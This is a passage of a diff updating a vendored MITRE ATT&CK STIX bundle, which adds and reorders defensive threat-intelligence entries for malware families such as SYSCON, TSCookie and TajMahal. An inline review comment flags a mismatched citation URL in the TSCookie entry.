+ "created": "2020-06-01T12:29:05.241Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "SDBot"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--0998045d-f96e-4284-95ce-3c8219707486",
@@ -199643,10 +229264,44 @@
],
"modified": "2020-03-30T18:08:50.209Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SEASHARPEE"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0450",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0450"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "SHARPSTATS",
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) is a .NET backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2019.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "id": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-21T13:12:36.865Z",
+ "created": "2020-05-18T19:51:37.488Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "SHARPSTATS"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -199724,15 +229379,15 @@
],
"modified": "2020-03-30T18:09:41.437Z",
"created": "2017-05-31T21:32:42.754Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SHOTPUT",
"Backdoor.APT.CookieCutter",
"Pirpi"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
@@ -199802,13 +229457,13 @@
],
"modified": "2020-03-30T18:10:33.691Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SLOWDRIFT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--3240cbe4-c550-443b-aa76-cc2a7058b870",
@@ -199840,13 +229495,13 @@
],
"modified": "2020-03-30T18:11:04.830Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SNUGRIDE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--9ca488bd-9587-48ef-b923-1743523e63b2",
@@ -199878,13 +229533,13 @@
],
"modified": "2020-03-30T18:11:45.403Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SOUNDBITE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--8b880b41-5139-4807-baa9-309690218719",
@@ -199912,13 +229567,13 @@
],
"modified": "2020-03-30T03:05:20.517Z",
"created": "2017-05-31T21:32:28.257Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SPACESHIP"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -199950,10 +229605,49 @@
],
"modified": "2020-03-30T18:12:51.198Z",
"created": "2019-06-18T18:40:33.671Z",
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"SQLRat"
+ ]
+ },
+ {
+ "id": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)",
+ "name": "SYSCON",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "x_mitre_version": "1.1"
+ "external_references": [
+ {
+ "external_id": "S0464",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0464"
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-15T15:17:10.012Z",
+ "created": "2020-06-02T18:46:58.489Z",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_aliases": [
+ "SYSCON"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--96b08451-b27a-4ff6-893f-790e26393a8e",
@@ -199981,15 +229675,15 @@
],
"modified": "2020-03-30T18:13:29.169Z",
"created": "2017-05-31T21:32:48.482Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Sakula",
"Sakurel",
"VIPER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -200036,14 +229730,14 @@
],
"modified": "2019-04-18T20:59:56.853Z",
"created": "2019-04-15T19:40:07.664Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
"SamSam",
"Samas"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -200071,15 +229765,15 @@
],
"modified": "2020-03-30T18:14:02.011Z",
"created": "2017-05-31T21:32:37.767Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"SeaDuke",
"SeaDaddy",
"SeaDesk"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -200116,13 +229810,13 @@
],
"modified": "2020-03-19T19:18:10.963Z",
"created": "2019-01-30T15:27:06.404Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Seasalt"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -200148,21 +229842,27 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T18:14:30.133Z",
+ "modified": "2020-05-29T19:31:03.708Z",
"created": "2019-05-29T13:14:38.638Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"ServHelper"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2017-05-31T21:33:20.223Z",
+ "modified": "2020-06-15T14:24:52.969Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"id": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Shamoon",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the \"Cutting Sword of Justice\" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the \"Cutting Sword of Justice\" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -200197,20 +229897,48 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "type": "malware",
- "labels": [
- "malware"
+ "x_mitre_platforms": [
+ "Windows"
],
- "modified": "2020-03-28T21:43:05.941Z",
- "created": "2017-05-31T21:33:20.223Z",
- "x_mitre_version": "2.1",
"x_mitre_aliases": [
"Shamoon",
"Disttrack"
],
+ "x_mitre_version": "2.1"
+ },
+ {
+ "id": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "name": "ShimRat",
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name \"[ShimRat](https://attack.mitre.org/software/S0444)\" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0444",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0444"
+ },
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-29T03:39:40.754Z",
+ "created": "2020-05-12T21:28:20.934Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "ShimRat"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--89f63ae4-f229-4a5c-95ad-6f22ed2b5c49",
@@ -200238,12 +229966,46 @@
],
"modified": "2020-03-18T16:17:41.437Z",
"created": "2017-05-31T21:32:13.407Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Skeleton Key"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0468",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0468"
+ },
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)",
+ "name": "Skidmap",
+ "id": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-26T04:03:50.568Z",
+ "created": "2020-06-09T21:23:38.995Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Skidmap"
+ ],
"x_mitre_platforms": [
- "Windows"
+ "Linux"
]
},
{
@@ -200285,14 +230047,14 @@
],
"modified": "2020-03-28T21:43:37.366Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Smoke Loader",
"Dofoil"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -200324,13 +230086,13 @@
],
"modified": "2020-03-30T18:14:59.190Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Socksbot"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -200358,14 +230120,14 @@
],
"modified": "2020-03-29T16:41:33.128Z",
"created": "2019-04-17T18:43:36.156Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"SpeakUp"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"id": "malware--2fb26586-2b53-4b9a-ad4f-2b3bcb9a2421",
@@ -200393,13 +230155,13 @@
],
"modified": "2020-03-18T15:53:57.549Z",
"created": "2017-05-31T21:32:39.606Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SslMM"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--96566860-9f11-4b6f-964d-1c924e4f24a4",
@@ -200431,16 +230193,16 @@
],
"modified": "2020-03-18T16:01:37.852Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Starloader"
+ "x_mitre_contributors": [
+ "Alan Neville, @abnev"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Alan Neville, @abnev"
- ]
+ "x_mitre_aliases": [
+ "Starloader"
+ ],
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -200481,13 +230243,13 @@
],
"modified": "2020-03-30T18:15:28.897Z",
"created": "2019-05-14T15:05:06.630Z",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"StoneDrill",
"DROPSHOT"
- ],
- "x_mitre_version": "1.1",
- "x_mitre_platforms": [
- "Windows"
]
},
{
@@ -200520,13 +230282,13 @@
],
"modified": "2020-03-30T18:15:56.762Z",
"created": "2017-05-31T21:33:21.437Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"StreamEx"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--6a0ef5d4-fc7c-4dda-85d7-592e4dbdc5d9",
@@ -200540,9 +230302,9 @@
"external_id": "S0018"
},
{
- "url": "https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards",
+ "source_name": "Alienvault Sykipot DOD Smart Cards",
"description": "Blasco, J. (2012, January 12). Sykipot variant hijacks DOD and Windows smart cards. Retrieved January 10, 2016.",
- "source_name": "Alienvault Sykipot DOD Smart Cards"
+ "url": "https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards"
},
{
"url": "http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments",
@@ -200557,15 +230319,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T18:16:28.886Z",
+ "modified": "2020-05-13T22:58:34.210Z",
"created": "2017-05-31T21:32:17.568Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Sykipot"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--04227b24-7817-4de1-9050-b7b1b57f5866",
@@ -200602,13 +230364,13 @@
],
"modified": "2020-03-30T18:17:52.697Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SynAck"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--7f8730af-f683-423f-9ee1-5f6875a80481",
@@ -200636,13 +230398,13 @@
],
"modified": "2020-03-18T23:13:31.404Z",
"created": "2017-05-31T21:32:40.391Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Sys10"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--876f6a77-fbc5-4e13-ab1a-5611986730a3",
@@ -200675,13 +230437,13 @@
],
"modified": "2020-03-31T12:40:49.213Z",
"created": "2017-05-31T21:33:01.951Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"T9000"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a",
@@ -200713,13 +230475,13 @@
],
"modified": "2020-03-30T18:18:53.335Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"TDTESS"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--4f6aa78c-c3d4-4883-9840-96ca2f5d6d47",
@@ -200760,14 +230522,14 @@
],
"modified": "2020-03-30T18:19:25.928Z",
"created": "2017-05-31T21:33:25.209Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"TEXTMATE",
"DNSMessenger"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
@@ -200803,6 +230565,53 @@
"modified": "2018-10-17T00:14:20.652Z",
"created": "2017-05-31T21:33:15.467Z"
},
+ {
+ "id": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "name": "TSCookie",
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets.(Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019). [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435) though more recent reporting indicates a separation between the two.(Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0436",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0436"
+ },
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ },
+ {
+ "source_name": "JPCert BlackTech Malware September 2019",
+ "url": "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "description": "Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020."
+ },
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-07T14:05:07.519Z",
+ "created": "2020-05-06T15:43:49.556Z",
+ "x_mitre_contributors": [
+ "Tatsuya Daitoku, Cyber Defense Institute, Inc."
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_aliases": [
+ "TSCookie"
+ ],
+ "x_mitre_version": "1.0"
+ },
{
"id": "malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
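Review bot: In the TSCookie object added in this hunk, the external reference named `JPCert PLEAD Downloader June 2018` reuses the URL of the March 2018 TSCookie post (`https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html`) while its description cites a different article and date, so one of the two citations points at the wrong page. This file is a vendored copy of the upstream ATT&CK STIX bundle, so the correction presumably belongs upstream rather than in this commit; noting in the commit description that the bundle is taken verbatim from a specific upstream release would make that provenance clear and give a place to re-sync once the reference is fixed. The `description` on the same object also carries a stray period before its second sentence (`... September 2019). [TSCookie] ...`), which looks like a copy-edit slip in the source data rather than something to patch here.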
@@ -200838,17 +230647,17 @@
],
"modified": "2020-03-30T18:20:01.325Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "TURNEDUP"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Christiaan Beek, @ChristiaanBeek",
"Ryan Becwar"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "TURNEDUP"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--7ba0fc46-197d-466d-8b9f-f1c64d5d81e5",
@@ -200878,15 +230687,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T20:18:09.300Z",
+ "modified": "2020-06-23T20:40:40.755Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"TYPEFRAME"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--b143dfa4-e944-43ff-8429-bfffc308c517",
@@ -200914,10 +230723,44 @@
],
"modified": "2020-03-30T18:21:09.468Z",
"created": "2017-05-31T21:32:14.900Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Taidoor"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0467",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0467"
+ },
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "TajMahal",
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://attack.mitre.org/software/S0467) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.(Citation: Kaspersky TajMahal April 2019)",
+ "id": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-15T21:19:30.717Z",
+ "created": "2020-06-08T14:57:32.842Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "TajMahal"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -200948,13 +230791,13 @@
],
"modified": "2020-03-30T18:21:44.275Z",
"created": "2017-05-31T21:32:12.310Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"TinyZBot"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--00806466-754d-44ea-ad6f-0caf59cb8556",
@@ -201019,19 +230862,19 @@
],
"modified": "2020-03-30T21:08:00.221Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
- "x_mitre_aliases": [
- "TrickBot",
- "Totbrick",
- "TSPY_TRICKLOAD"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Omkar Gudhate",
"FS-ISAC"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "TrickBot",
+ "Totbrick",
+ "TSPY_TRICKLOAD"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "malware--82cb34ba-02b5-432b-b2d2-07f55cbf674d",
@@ -201059,13 +230902,13 @@
],
"modified": "2020-03-17T15:08:58.099Z",
"created": "2017-05-31T21:33:00.176Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Trojan.Karagany"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--c5e9cb46-aced-466c-85ea-7db5572ad9ec",
@@ -201093,13 +230936,13 @@
],
"modified": "2020-03-30T18:22:55.430Z",
"created": "2017-05-31T21:32:11.148Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Trojan.Mebromi"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--691c60e2-273d-4d56-9ce6-b67e0f8719ad",
@@ -201141,13 +230984,13 @@
],
"modified": "2020-03-18T16:10:02.987Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Truvasys"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c",
@@ -201179,13 +231022,13 @@
],
"modified": "2020-03-30T18:23:32.096Z",
"created": "2017-10-25T14:48:42.313Z",
- "x_mitre_aliases": [
- "Twitoor"
- ],
- "x_mitre_version": "1.3",
- "x_mitre_old_attack_id": "MOB-S0018",
"x_mitre_platforms": [
"Android"
+ ],
+ "x_mitre_old_attack_id": "MOB-S0018",
+ "x_mitre_version": "1.3",
+ "x_mitre_aliases": [
+ "Twitoor"
]
},
{
@@ -201218,13 +231061,13 @@
],
"modified": "2020-03-30T18:24:01.572Z",
"created": "2019-01-29T19:09:26.355Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"UBoatRAT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa",
@@ -201260,14 +231103,14 @@
],
"modified": "2020-03-30T18:24:27.229Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"UPPERCUT",
"ANEL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--af2ad3b7-ab6a-4807-91fd-51bcaff9acbb",
@@ -201300,12 +231143,46 @@
],
"modified": "2020-03-18T16:11:07.955Z",
"created": "2017-05-31T21:33:17.716Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"USBStealer",
"USB Stealer",
"Win32/USBStealer"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0452",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0452"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
